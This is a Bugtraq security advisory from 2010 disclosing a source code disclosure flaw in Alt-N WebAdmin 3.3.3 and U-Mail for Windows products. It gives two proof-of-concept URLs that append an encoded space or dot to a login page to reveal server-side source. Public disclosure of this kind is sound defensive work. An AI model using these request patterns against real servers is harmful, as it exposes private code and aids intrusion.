[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Alt-N WebAdmin Source Code Disclosure
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Alt-N WebAdmin Source Code Disclosure
- From: wsn1983@xxxxxxxxx
- Date: 17 Dec 2010 14:11:07 -0000
Vulnerable: v3.3.3
Vendor: www.altn.com
Category: Environment Error
Vulnerable
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8
U-Mail GateWay for Windows V9.8
Details:
=========
A source code disclosure vulnerability exists with Alt-N WebAdmin Server.
Remote attacker can be exploited to disclose the source code by appending "%2e"
or "%20" to a URI.
Test on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8
POC:
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e
Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/